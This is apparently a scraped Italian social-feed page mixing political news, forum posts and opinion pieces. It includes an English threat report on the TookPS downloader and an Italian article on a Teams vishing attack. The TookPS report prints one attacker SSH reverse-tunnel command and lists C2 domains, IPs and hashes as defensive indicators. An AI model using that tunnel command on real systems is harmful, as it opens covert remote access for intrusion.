Salta al contenuto principale




Proteggere i diritti dell’infanzia in Palestina. Rinforzare la responsabilità internazionale.


@Notizie dall'Italia e dal mondo
Il video dell'evento parallelo al 58esimo Consiglio dei diritti umani delle Nazioni Unite, organizzato da Defence for Children International e trasmesso in collaborazione con Pagine Esteri.
L'articolo Proteggere i diritti



In questi giorni potrebbero arrivare le lettere di licenziamento ai 121 lavoratori e lavoratrici dell’ex-GKN. Il 31 Marzo è stato l’ultimo giorno della procedura di mobilità ed è stata negata dall’azienda la possibilità di proroga della mobilità in attesa della pubblicazione del piano concordatario sulla cui base si sarebbe potuto impostare un piano di salvaguardia dei posti di lavoro.
Ancora una volta la società QF si è mostrata indisponibile alla salvaguardia di posti di lavoro e sorda alle proposte di reindustrializzazione del sito. Questo viene reso ancora più grave dalla violazione delle norme contro la delocalizzazione, di cui è stata chiesta dalla GKN e dalla FIOM applicazione.
La più importante lotta operaia italiana, che era riuscita anche nell’impresa di proporre dei piani di reindustrializzazione del sito e di raccolta di più di un milione di euro da immettere nel capitale sociale della Cooperativa che avrebbe svolto queste nuove attività, rischia di finire.
Come Giovani Comunisti/e siamo dal primo giorno stati a fianco di questa lotta e degli operai e delle operaie che per quasi 4 lunghi anni l’hanno portata avanti. Crediamo che debba intervenire il MIMIT al fine di salvaguardare i posti di lavoro e la possibilità che in quel luogo si possa continuare a produrre, tramite la Cooperativa della GKN, non più secondo una logica padronale bensì di cooperazione e mutuo soccorso.

Paolo Bertolozzi, coordinatore nazionale Giovani Comunisti/e
Auro Bizzoni, responsabile nazionale Lavoro Giovani Comunisti/e



TookPS: DeepSeek isn’t the only game in town


In early March, we published a study detailing several malicious campaigns that exploited the popular DeepSeek LLM as a lure. Subsequent telemetry analysis indicated that the TookPS downloader, a malware strain detailed in the article, was not limited to mimicking neural networks. We identified fraudulent websites mimic official sources for remote desktop and 3D modeling software, alongside pages offering these applications as free downloads.

Malicious websites
Malicious websites

UltraViewer, AutoCAD, and SketchUp are common business tools. Therefore, potential victims of this campaign include both individual users and organizations.

Our telemetry also detected file names such as “Ableton.exe” and “QuickenApp.exe”, alongside malicious websites. Ableton is music production software for composition, recording, mixing, and mastering, and Quicken is a personal finance app for tracking expenses, income, debts, and investments across various accounts.

TookPS


In our report on attacks exploiting DeepSeek as a lure, we outlined the infection chain initiated by Trojan-Downloader.Win32.TookPS. Let us delve into this. Upon infiltrating a victim’s device, the downloader reaches out to its C2 server, whose domain is embedded in its code, to retrieve a PowerShell script. Different malware samples communicate with different domains. For example, the file with the MD5 hash 2AEF18C97265D00358D6A778B9470960 reached out to bsrecov4[.]digital, which was inactive at the time of our research. It received the following base64-encoded command from that domain:

Original command
Original command

Decoding reveals the PowerShell command being executed:

The variable “$TookEnc” stores an additional base64-encoded data block, also executed in PowerShell. Decrypting this reveals the following command:

Decoded command from $TookEnc variable shown in the previous screenshot
Decoded command from $TookEnc variable shown in the previous screenshot

Example of decrypting another command from $TookEnc variable
Example of decrypting another command from $TookEnc variable

Although different samples contain different URLs, the command structure remains identical. These commands sequentially download and execute three PowerShell scripts from the specified URL. The first script downloads “sshd.exe”, its configuration file (“config”), and an RSA key file from the C2 server. The second script retrieves command-line parameters for “sshd” (remote server address, port, and username), and then runs “sshd”.

Example of a malicious PowerShell command generated by the PowerShell script:
ssh.exe -N -R 41431:localhost:109 Rc7DexAU73l@$ip_address -i "$user\.ssh\Rc7DexAU73l.41431" -f "$user\.ssh\config"
This command starts an SSH server, thereby establishing a tunnel between the infected device and the remote server. For authentication, it uses the RSA key downloaded earlier, and the server configuration is sourced from the “config” file. Through this tunnel, the attacker gains full system access, allowing for arbitrary command execution.

The third script attempts to download a modified version of the Backdoor.Win32.TeviRat malware onto the victim’s machine, which is a well-known backdoor. The sample we obtained uses DLL sideloading to modify and deploy the TeamViewer remote access software onto infected devices. In simple terms, the attackers place a malicious library in the same folder as TeamViewer, which alters the software’s default behavior and settings, hiding it from the user and providing the attackers with covert remote access. This campaign used the domain invoicingtools[.]com as the C2.

Part of the script that downloads Backdoor.Win32.TeviRat
Part of the script that downloads Backdoor.Win32.TeviRat

Additionally, Backdoor.Win32.Lapmon.* is downloaded onto the compromised device. Unfortunately, we were not able to establish the exact delivery method. This backdoor uses the domain twomg[.]xyz as its C2.

In this manner, the attackers gain complete access to the victim’s computer in variety of ways.

Infrastructure


The malicious scripts and programs in this attack primarily used domains registered in early 2024, hosted at two IP addresses:

C2 domains and corresponding IPs
C2 domains and corresponding IPs

We found no legitimate user-facing resources at these IP addresses. Alongside the campaign-related domains, we also found other domains long blocked by our security solutions. This strongly suggests these attackers had used other tools prior to TookPS, Lapmon, and TeviRat.

Takeaways


The DeepSeek lure attacks were merely a glimpse into a large-scale campaign targeting both home users and organizations. The malware distributed by the attackers was disguised as popular software, including business-critical applications. They attempted to gain covert access to the victim’s device through a variety of methods after the initial infection.

To protect against these attacks, users are advised to remain vigilant and avoid downloading pirated software, which may represent a serious threat.

Organizations should establish robust security policies prohibiting software downloads from dubious sources like pirated websites and torrents. Additionally, regular security awareness training is essential for ensuring a proper level of employee vigilance.

IOCs


MD5
46A5BB3AA97EA93622026D479C2116DE
2DB229A19FF35F646DC6F099E6BEC51F
EB6B3BCB6DF432D39B5162F3310283FB
08E82A51E70CA67BB23CF08CB83D5788
8D1E20B5F2D89F62B4FB7F90BC8E29F6
D26C026FBF428152D5280ED07330A41C
8FFB2A7EFFD764B1D4016C1DF92FC5F5
A3DF564352171C207CA0B2D97CE5BB1A
2AEF18C97265D00358D6A778B9470960
8D0E1307084B4354E86F5F837D55DB87
7CB0CA44516968735E40F4FAC8C615CE
62CCA72B0BAE094E1ACC7464E58339C0
D1D785750E46A40DEF569664186B8B40
EE76D132E179623AD154CD5FB7810B3E
31566F18710E18F72D020DCC2FCCF2BA
F1D068C56F6023FB25A4F4F0CC02E9A1
960DFF82FFB90A00321512CDB962AA5B
9B724BF1014707966949208C4CE067EE

URLs
Nicecolns[.]com
sketchup-i3dmodels-download[.]top
polysoft[.]org
autocad-cracked[.]com
ultraviewer[.]icu
ultraview-ramotepc[.]top
bsrecov4[.]digital
downloader[.]monster
download[.]monster
pstuk[.]xyz
tukeps2ld[.]online
twomg[.]xyz
tuntun2[.]digital
invoicingtools[.]com
tu02n[.]website
inreport2[.]xyz
inrep[.]xyz

IPs
88[.]119.175.187
88[.]119.175.184
88[.]119.175.190


securelist.com/tookps/116019/



Coloni israeliani delusi dalle macerie di Jenin: «Non ci basta, vogliamo questa città come Gaza»


@Notizie dall'Italia e dal mondo
Il giornale Yisrael HaYom riferisce di un tour organizzato dai comandi militari per mostrare i risultati dell'operazione "Muro di Ferro". I coloni chiedono di intensificare ulteriormente l’offensiva militare



L’automazione non ci ha reso liberi dal lavoro, e dallo sfruttamento


@Informatica (Italy e non Italy 😁)
Chi e come lavorerà nell’era in cui il mito dell’intelligenza artificiale sta prendendo il posto di quello dell’automazione? Ne abbiamo parlato con chi ha studiato l’automazione dal Dopoguerra ad oggi, il professore di Storia contemporanea Jason Resnikoff.
L'articolo L’automazione



Aiuto per trattamento antitarlo


A tutto il Fediverso, ripeto, a tutto il Fediverso.

Allarme, ripeto allarme.

May Day, May Day!

Da notti sento qualcosa che si sta sgranocchiando l'armadio nella mia camera da letto, temo siano tarli.

Devo fare un trattamento antitarlo ma non l'ho mai fatto, e in più sono un uomo moderno, di quelli che non sanno fare niente (al contrario degli uomini di una volta, che sapevano fare tutto).

Qualcuno di voi ha esperienza di trattamenti del genere?

Non datemi link a pagine che ne parlano, quelli li trovo da me, cerco gente che l'ha fatto per davvero.

Basta Trump, basta Vance, basta Musk, da oggi vi voglio tutti concentrati sul mio armadio.

Passo.

in reply to Max su Poliverso 🇪🇺🇮🇹

@max esistono degli appositi veleni li trovi sia dai consorzi agrari che nei negozi di bricolage. Con grande pazienza ed una buona siringa, devi ispezionare il legno e iniettare il veleno in ogni buchetto che trovi. Quindi inserisci nel buchetto uno stuzzicadenti, che ha due funzioni: 1 ti ricorda che quel buco è già stato trattato.
2 il tarlo se c'era resta murato dentro fino a che muore.
Quando hai finito il trattamento su tutto il mobile avrai un Novello San Sebastiano..
A quel punto con una lametta o con un cutter tagli tutti gli stuzzicadenti in maniera da tappare il foro a livello, in funzione del colore del mobile passerai qualcosa per mascherare l'esistenza degli stuzzicadenti e quindi darai un prodotto a finitura.
Buon lavoro
in reply to Maurizio

@maurizio

Ti ringrazio molto.

Purtroppo non vedo buchi... ripasserò con una lente di ingrandimento ma possibile che siano così piccoli da essere invisibili?

Ho perlustrato gli interni e la parte superiore, le pareti esterne non ancora in maniera approfondita ma sono trattate e ho pensato che se fossi stato un tarlo avrei preferito entrare dall'alto, dove c'è il legno più grezzo, non trattato.

A dire il vero all'interno ci sono buchi ma sono fori fatti ad hoc, hanno un diametro da 5mm, una volta c'erano delle viti che tenevano qualcosa poi è stato smontato il "qualcosa" e sono rimasti i buchi. Sono anche quelli buchi a rischio?



Il ritorno di Mariani in Mbda e le sfide future della missilistica europea

@Notizie dall'Italia e dal mondo

Lorenzo Mariani ha (nuovamente) assunto il ruolo di Executive group director sales & business development, nonché managing director, di Mbda Italia, succedendo a Giovanni Soccodato. Mariani ritorna dunque in Mbda Italia dopo un periodo in Leonardo, dove ha ricoperto il



Cantieristica, il nucleare ha il potenziale per rivoluzionare il settore. Ecco come

@Notizie dall'Italia e dal mondo

Il nucleare potrebbe rappresentare una svolta, non solo per l’autonomia energetica nazionale, ma anche per il settore della cantieristica. Il dibattito sulla possibilità di un ritorno del nucleare in Italia sta aprendo a diverse prospettive circa l’impiego di nuove tecnologie



Oggi in occasione della Giornata mondiale per la Consapevolezza sull'Autismo il Palazzo dell'Istruzione è stato illuminato di blu.

Il Ministro Giuseppe Valditara ha invitato le scuole a organizzare momenti di condivisione e di approfondimento.

Poliverso & Poliversity reshared this.



Sicurezza cyber, la chiave è la partnership tra umano e intelligenza artificiale


@Informatica (Italy e non Italy 😁)
Le capacità di protezione e difesa nella cyber security possono essere migliorate in un mix di collaborazione arricchita ed efficacia aumentata attraverso l’impiego di un “ibrido operativo” formato dall'individuo e agenti di AI.



Attacco informatico via Teams: un semplice messaggio può compromettere la tua azienda!


Con l’uso crescente di strumenti di collaborazione come Microsoft Teams, le aziende devono essere consapevoli dei rischi legati a possibili attacchi informatici. Implementare misure di sicurezza avanzate e formare adeguatamente gli utenti diventa essenziale per contrastare le minacce. In risposta a questo problema, Microsoft ha annunciato l’introduzione di notifiche di sicurezza in Quick Assist, progettate per avvisare gli utenti di possibili tentativi di truffa legati al supporto tecnico. Inoltre, si consiglia alle organizzazioni di limitare o disattivare l’uso di Quick Assist e altri strumenti di accesso remoto, qualora non siano strettamente necessari, per ridurre il rischio di compromissione.

Un attacco sofisticato con vishing e strumenti legittimi


Un recente rapporto del Cyber Defence Centre di Ontinue ha documentato un attacco in cui gli hacker hanno utilizzato una combinazione di ingegneria sociale, vishing (phishing vocale) e software di accesso remoto per infiltrarsi nei sistemi aziendali.

La tecnica di attacco prevedeva l’invio di un messaggio su Microsoft Teams contenente un comando PowerShell dannoso. Approfittando della fiducia degli utenti nelle comunicazioni interne, il cybercriminale si spacciava per un tecnico IT per convincere la vittima ad eseguire il comando e a concedere accesso remoto attraverso Quick Assist. Questa tattica è coerente con le tecniche adottate dal gruppo Storm-1811, noto per utilizzare vishing e strumenti di supporto remoto per ottenere il controllo dei dispositivi bersaglio.

Il payload e l’installazione della backdoor


Dopo aver ottenuto l’accesso iniziale, gli attaccanti hanno sfruttato il sideloading DLL per eseguire codice malevolo attraverso un file binario firmato e legittimo di TeamViewer.exe, che ha caricato un modulo dannoso TV.dll.

Questo approccio consente di eludere i sistemi di sicurezza, poiché l’eseguibile sembra autentico. La seconda fase dell’attacco ha comportato l’esecuzione di una backdoor basata su JavaScript tramite Node.js (hcmd.exe), la quale ha stabilito una connessione persistente ai server di comando e controllo degli aggressori.

Grazie alle funzionalità socket, gli hacker potevano eseguire comandi da remoto senza essere rilevati facilmente.

Strategie di rilevamento e prevenzione


La catena di attacco osservata rientra in diverse categorie del framework MITRE ATT&CK, tra cui:

  • T1105 – Trasferimento di strumenti malevoli
  • T1656 – Impersonificazione
  • T1219 – Utilizzo di software di accesso remoto
  • T1218 – Esecuzione tramite binari firmati
  • T1197 – Abuso dei lavori BITS

Per mitigare il rischio di simili attacchi, gli esperti di sicurezza consigliano alle aziende di limitare l’uso di strumenti di accesso remoto non indispensabili e di disabilitare le connessioni esterne a Teams. Inoltre, la formazione dei dipendenti su tecniche di ingegneria sociale e phishing vocale è fondamentale per ridurre la probabilità di cadere vittima di queste sofisticate campagne malevole.

L'articolo Attacco informatico via Teams: un semplice messaggio può compromettere la tua azienda! proviene da il blog della sicurezza informatica.



Ucraina, disinquinare la discussione pubblica sul conflitto


Valigia Blu evidenzia le omissioni, le incongruenze e alcune distorsioni presenti nell’articolo di Kuperman.
Buona lettura


A Toothbrush Hacked, in Three Parts


It’s official, we’re living in the future. Certainly that’s the only explanation for how [wrongbaud] was able to write a three-part series of posts on hacking a cheap electric toothbrush off of AliExpress.

As you might have guessed, this isn’t exactly a hack out of necessity. With a flair for explaining hardware hacking, [wrongbaud] has put this together as a practical “brush-up” (get it?) on the tools and concepts involved in reverse engineering. In this case, the Raspberry Pi is used as a sort of hardware hacking multi-tool, which should make it relatively easy to follow along.
Modified image data on the SPI flash chip.
The first post in the series goes over getting the Pi up and running, which includes setting up OpenOCD. From there, [wrongbaud] actually cracks the toothbrush open and starts identifying interesting components, which pretty quickly leads to the discovery of a debug serial port. The next step is harassing the SPI flash chip on the board to extract its contents. As the toothbrush has a high-res color display (of course it does), it turns out this chip holds the images which indicate the various modes of operation. He’s eventually able to determine how the images are stored, inject new graphics data, and write it back to the chip.

Being able to display the Wrencher logo on our toothbrush would already be a win in our book, but [wrongbaud] isn’t done yet. For the last series in the post, he shows how to extract the actual firmware from the microcontroller using OpenOCD. This includes how to analyze the image, modify it, and eventually flash the new version back to the hardware — using that debug port discovered earlier to confirm the patched code is running as expected.

If you like his work with a toothbrush, you’ll love seeing what [wrongbaud] can do with an SSD or even an Xbox controller.


hackaday.com/2025/04/02/a-toot…



Yaroslav Zheleznyak è un deputato della Rada ucraina eletto nelle liste di Holos, partito liberale, atlantista ed europeista. Giovedì scorso ha pubblicato un post sul suo canale Telegram dopo aver letto il nuovo accordo sui minerali proposto dagli Stati Uniti a Zelensky e quel che descrive è al limite dell’estorsione. Zheleznyak sintetizza così: “Il testo che ho visto è semplicemente orribile: tutte le 18 sezioni. Questo non è più un memorandum d'intenti quadro, come lo era prima dello scandaloso incontro nello Studio Ovale). Si tratta di un accordo molto ampio e molto chiaro, e non è a nostro favore"

Queste le condizioni del nuovo accordo:

La formazione di un consiglio di cinque membri per la gestione del fondo che verrà creato per accumulare i profitti, tre dei quali provenienti dagli Stati Uniti, tutti con pieno potere di veto.
L’elenco delle risorse naturali inserite nell’accordo è ampliato rispetto al precedente e ora comprende anche petrolio e gas da giacimenti vecchi e nuovi.
Gli USA non prevedono alcun ulteriore investimento per la difesa ucraina in quanto ritengono di aver già contribuito nel 2022.
Gli USA hanno diritto di prelazione su tutti gli investimenti in progetti infrastrutturali e nello sfruttamento delle risorse minerarie dell'Ucraina, compresi petrolio e gas e le infrastrutture energetiche
Kiev dovrà destinare il 50 per cento dei ricavi derivanti da nuovi progetti infrastrutturali e dallo sfruttamento delle risorse naturali al fondo per la copertura delle spese statunitensi dall'inizio della guerra, mentre gli Stati Uniti avrebbero diritto all'intero profitto più un rendimento annuo del 4 per cento fino al recupero del loro investimento.
Il contratto è a tempo indeterminato ed ogni modifica potrà essere fatta solo previa accettazione da parte degli USA.
Le imprese americane avranno tutti i vantaggi sullo sfruttamento delle risorse. Anche in caso di una nuova guerra. L'intesa prevede un indennizzo in caso di blocco dell'estrazione per cause di forza maggiore, e un regime fiscale speciale che riduce le tasse per le aziende statunitensi.
Gli USA non si impegnano in nessuna garanzia di sicurezza.
Di un accordo del genere si potrebbe dire una sola cosa: il pizzo della mafia è meno oneroso. Zelensky ha abbozzato una reazione a dir poco blanda, con un solo sussulto, anche di un certo rilievo, quando ha dichiarato che non riconosce i soldi ricevuti dagli USA come debito. Ma è l’unica scintilla, pure soffusa. Il presidente ucraino non ha infatti rifiutato l’accordo e anzi è pronto a venire incontro agli interessi USA e alle volontà di Trump, aprendo alla firma in tempi brevi dell’accordo. La richiesta massima da parte sua sarà l’inserimento di garanzie di sicurezza, ma non sul resto dell’accordo.

Gli USA fanno gli USA, la storia ce lo insegna e l’Ucraina è l’ennesima vittima, forse una delle più grandi. Le fasi sono sempre le stesse: prima ti adulano, poi ti mandano in guerra e alla fine ti spolpano. Hanno sempre fatto così, con ogni stato “amico”. Eppure, nonostante la realtà sia così chiara, in Europa si decide per un riarmo da 800 miliardi inutile e atto solo a salvare un settore industriale in discesa libera e con una Germania che rischia di entrare in una crisi produttiva senza precedenti. L’Ucraina in tutto ciò non ricava nulla. Stellantis e Volkswagen sì.

A distanza di 11 anni da Euromaidan e 3 dall’inizio dell’intervento russo alcune conclusioni le possiamo tirare, anzi, ribadire. L’Ucraina è un mezzo con la quale gli Stati Uniti hanno cercato e cercano di rimandare la fine della loro egemonia sul mondo, producendo una instabilità senza precedenti in tutto il mondo. L’Europa è in piena isteria, causata da una crisi produttiva industriale sempre più pesante e dall’estrazione continua di capitali da parte degli “alleati” USA, che sono obbligati dal loro sistema economico semi deindustrializzato a disossare il vecchio continente per non far scoppiare la bolla finanziaria, che intanto si ingrossa.

Dal canto suo la Russia in questi 11 anni ha fatto più volte la sua unica richiesta: non espandere ulteriormente la NATO verso i propri confini. Una richiesta che, come riferito da Stoltenberg poco dopo l’inizio dell’intervento di Mosca, era una precondizione per impedire l’invasione del suolo ucraino e che la NATO ha rigettato immediatamente. Lo stesso Peskov, portavoce del Cremlino, aveva riferito riguardo l’assenza di ogni ostacolo da parte russa per l’adesione dell’Ucraina all’Unione Europea, in quanto non intacca la questione della sicurezza dei confini russi. L’Europa ha preferito garantire gli interessi USA a discapito dei propri.

Alla luce di questo nuovo accordo sui minerali proposto da Trump a Zelensky, che oltretutto non comprende tutta la lunghissima ricostruzione del paese, già preda di aziende multinazionali occidentali che si sfregano le mani per i profitti che faranno, dovremmo farci una domanda:

Dobbiamo salvare l’Ucraina dai russi o dagli Stati Uniti?

Forse la verità è quella che quelli che vengono chiamati “putinisti pacifinti” ripetono da anni. L’Ucraina è solo una vittima, non dei russi, ma di un occidente decaduto che cerca con le unghie e con i denti di rifiutare un mondo che non accetta più la sua violenta egemonia. La cosa migliore per Zelensky sarebbe voltarsi, rivolgere le armi verso Ovest e far finire lui la guerra. Se solo avesse reamente il potere di farlo, ma non ce l’ha.



Trump, un lupo impazzito che vuole passare per agnello.


In un discorso al congresso di qualche giorno fa, #TRUMP, alias #postus ha dichiarato "In qualunuque modo ci tasseranno, noi tasseremo loro!"

Il riferimento è ovviamente ai dazi, e la domanda dunque sorge spontanea: com'è possibile che per moliti americani Biden non si potesse eleggere in quanto ormai "rimbecillito", ma alla fine ci ritroviamo questo qui? Questo vi pare normale?

Certo, Trump dice tutte queste cose con lucidità, probabilmente, tanto da far sorgere un'altra domanda.

Cosa vi ricorda qualcuno che crea un problema e poi vuol far credere di essere le vittima quando gli altri rispondono al problema da lui stesso causato?

Come si chiama questa situazione, che ora non mi sovviene? Ah, sì! Putin.

Fateci caso, la dialettica è esattamente la stessa. Non credo che servano ulteriori dimostrazioni.

#russia
#usa
#putin
#paraculo
#statiuniti
#dazi



Si è insediato oggi l’Osservatorio permanente per l’inclusione scolastica, ricostituito con decreto ministeriale n.


#Ucraina, diplomazia in contromano


altrenotizie.org/primo-piano/1…


A vulnerability in Pixelfed caused private posts from other platforms to leak, a post-mortem on the CSAM scanner from IFTAS, and Fediforum has been cancelled.


Missioni internazionali, l’Italia rafforza il suo ruolo tra Europa e Nato

@Notizie dall'Italia e dal mondo

L’Italia può essere protagonista di una nuova architettura della sicurezza, cercando un equilibrio tra autonomia strategica europea e impegno nella Nato. Mosca e Pechino si muovono con strategie precise, mentre Washington chiede un maggiore impegno europeo, anche nel Mar Rosso. Le sfide non





Un nuovo predatore degli oceani. Putin vara il sottomarino Perm

@Notizie dall'Italia e dal mondo

La flotta sottomarina di Mosca ha compiuto un altro passo avanti lo scorso giovedì 27 marzo quando i cantieri navali della Sevmash, siti nella nordica cittadina di Severodvinsk (oblast’ di Archangelsk), hanno varato ufficialmente il Perm, sesto esemplare (su dieci teorici) dei sommergibili



vorrei capire perché alcuni link li prende così male...


BAFF OFF – Masie in concerto il 4 aprile al Circolo Gagarin
freezonemagazine.com/news/baff…
Maisie in concerto per il Busto Arsizio Film Festival Il 4 aprile, all’interno del programma del BAFF Busto Arsizio Film Festival, è la volta di un evento musicale, il concerto dei Maisie. Progetto nato a Messina nel 1994 dal talento di Alberto Scotti e di Cinzia La Fauci e oggi di stanza a Busto Arsizio, […]
L'articolo BAFF OFF – Masie in



Ungheria: storia di una democrazia illiberale (e della sua possibile fine)


Il 18 marzo il parlamento ungherese ha approvato un emendamento alla legge sul diritto di assemblea, che di fatto vieta l'organizzazione pubblica del Pride.

In caso di trasgressione gli eventuali partecipanti potranno essere sanzionati con multe fino a 500 euro. La loro identificazione potrà avvenire tramite registrazione delle immagini e utilizzo di software di riconoscimento facciale.

Nel mio servizio uscito su Valigia Blu, parto da questa storia di straordinario restringimento delle libertà civili per raccontarvi il momento storico che sta vivendo l'Ungheria. Mentre Orbán lancia cupe dichiarazioni, il suo partito si trova per la prima volta in difficoltà nei sondaggi. A un anno dalle elezioni la partita è aperta.

Per capire dove siamo e come siamo arrivati fin qui è utile riavvolgere il nastro degli ultimi 15 anni.

Buona lettura.

valigiablu.it/ungheria-orban-d…

in reply to FabioTurco

sono decenni che il governo ungherese restringe le liberta'. Il fatto che ve ne accorgiate solo quando tocca una specifica minoranza mi fa capire che cazzo di merde ipocrite che siete.



La newsletter di psicoterapia, sistemi, relazioni


Questa invece è la newsletter che parla di cose psico: sistemica, psicoterapia, relazioni.
massimogiuliani.it/blog/newsle…


La mia newsletter musicale


Parte la mia newsletter che informerà delle cose che scrivo sul mio blog musicale, su Free Zone, su I Giovani del Folk Studio.
Si chiama "Gente con la chitarra", come il mio libro di due anni fa.
Per iscriversi:
radiotarantula.wordpress.com/n…


il comunque rimango dell'idea che per il PD Bonacini era una scelta migliore... chi è causa del suo mal pianga se stesso.
in reply to simona

ah certo dopo ogni governo monti e draghi ecc chi vince le elezioni? Quella spazzatura lì fa politica solo per riempirsi le tasche con un solo scopo togliere si poveri per dare ai ricchi.
in reply to Estiqaatzi

l qualunquismo del "sono tutti ladri" eh? vabbè... neppure un'argomentazione politica. non c'è da rispondere.




“Chi ama la democrazia non può gioire” dice Meloni.

Chi ama la democrazia, signor presidento, GIOISCE eccome quando un ladro viene condannato e dichiarato INELEGGIBILE.

L'avessero fatto anche negli USA ora il mondo sarebbe un posto migliore, e invece...

reshared this



Israele attacca ancora Beirut. Unicef: a Gaza 322 bambini uccisi in 10 giorni dai raid aerei


@Notizie dall'Italia e dal mondo
La scorsa notte le bombe hanno ucciso almeno 4 persone tra cui un dirigente di Hezbollah. Il movimento sciita è pronto a rispondere. A Gaza ucciso un altro giornalista, Mohammed Bardawil
L'articolo Israele attacca ancora



GAZA. Israele si rifiuta di garantire la sicurezza degli operatori umanitari


@Notizie dall'Italia e dal mondo
In un'inchiesta del Financial Times, Rachael Cummings, direttrice umanitaria di Save the Children a Gaza, ha spiegato che l'organizzazione ha ridotto le proprie attività dell'80% poiché Israele non riconosce più le notifiche inviate tramite la



Le Pen ineleggibile, Meloni: “Chi crede nella democrazia non può gioire”


@Politica interna, europea e internazionale
“Nessuno che creda davvero nella democrazia può gioire di una sentenza che colpisce il leader di un grande partito, privando milioni di cittadini della loro rappresentanza”. Così la presidente del Consiglio Giorgia Meloni commenta la pronuncia del Tribunale penale di Parigi che ieri ha



"Una sentenza politica, violato lo stato di diritto".

Che noia 'sti fascisti che quando li beccano con le mani nella marmellata si spacciano subito per vittime di un sistema antidemocratico...

rainews.it/articoli/2025/03/il…



Il mondo secondo Raul Capote. Intervista al primo agente cubano infiltrato nella Cia


@Notizie dall'Italia e dal mondo
Giornalista del quotidiano Granma, analista politico ed ex agente della sicurezza dello Stato cubano, Capote ha raccontato la sua esperienza in vari libri, anche tradotti in italiano, nei quali ha analizzato in prospettiva storica le



Scuola, oggi al #MIM si svolge la XIV edizione dei Campionati di Italiano, dedicati a Giovanni Boccaccio, in occasione dei 650 anni dalla sua scomparsa.

Qui potete seguire la diretta in corso ▶️ youtube.

#MIM